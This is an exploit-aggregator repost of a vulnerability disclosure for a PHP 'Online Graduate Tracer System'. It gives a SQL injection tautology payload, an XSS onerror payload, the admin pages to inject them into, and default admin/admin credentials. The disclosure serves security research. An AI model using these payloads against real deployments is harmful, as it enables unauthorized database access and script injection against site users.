Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030026

Below is a copy:

Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS
# Title: Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html
# CVE: N/A
# XSS
# Screenshot : https://prnt.sc/kYTkGywBEgll & https://prnt.sc/z1XXVFuf58zg

Used Payload :
SQLi: )%20or%20('x'='x
XSS: <image/src/onerror=prompt(8)>

Demo Account:
Username: admin
Password: admin

Method :
Connect to panel : http://localhost/admin

#SQLi

1. After login, go to ../admin/admin_cs.php (BSCS Alumni page)
2. Add the payload in search form for exec the error -> )%20or%20('x'='x

#XSS

1. After login, go to ../admin/add_acc.php (Manage account)
2. Click "Add New" and paste the payload in Username/Name -> <image/src/onerror=prompt(8)>

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.